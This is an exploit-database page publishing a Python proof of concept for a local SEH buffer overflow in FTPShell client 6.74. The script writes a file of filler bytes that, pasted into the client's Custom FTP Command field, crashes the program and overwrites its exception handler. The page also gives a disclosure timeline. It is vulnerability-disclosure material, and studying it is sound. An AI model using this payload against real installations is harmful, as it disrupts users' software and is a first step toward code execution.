Share
## https://sploitus.com/exploit?id=PACKETSTORM:154482
#!/usr/bin/python  
  
  
# Exploit Type : DOS  
# Exploit Title: FTPShell client 6.74 - Local Buffer Overflow (SEH)  
# Vulnerable Software & version : FTPShell client 6.74  
# Vendor Homepage: https://www.ftpshell.com/  
# Software Link: https://www.ftpshell.com/downloadclient.htm  
# Tested Windows : Windows Vista Ultimate SP2(32-bit), Windows 7  
Professional SP1(32-bit)  
# Exploit Author: Debashis Pal  
# Timeline  
# Vulnerability Discover Date: 03-Sep-2019  
# Vulnerability Report to Vendor:03-Sep-2019,No responds  
# Again email to Vendor:05-Sep-2019 ,No responds  
# Public Disclose : 09-Sep-2019  
  
  
# PoC  
# 1. FTPShellclient6-74POC.txt from POC.py code, open in  
notepad(FTPShellclient6-74POC.txt), copy contents  
# 2. Open Core FTPShell client 6.74 & connect to a FTP server  
(FTPShell client 6.74 i.e. FTP session need to active along with  
username & password)  
# 3. From FTPShell client 6.74 menu bar select the Tools-> Custom FTP Command  
# 4. paste contents from notepad (into "Custom FTP Command" input field)  
# 5. Application will crash and SEH overwritten  
  
  
  
crash = "\x41" * 396 #Junk  
crash += "\x43" * 4 #nSEH  
crash += "\x42" * 4 #SEH  
crash += "\x44" * 96 #More Junk  
  
  
file="FTPShellclient6-74POC.txt"  
generate=open(file, "w")  
generate.write(crash)  
generate.close  
  
  
Attachment# Application crash and SEH overwritten.jpg  
  
  
Thanks.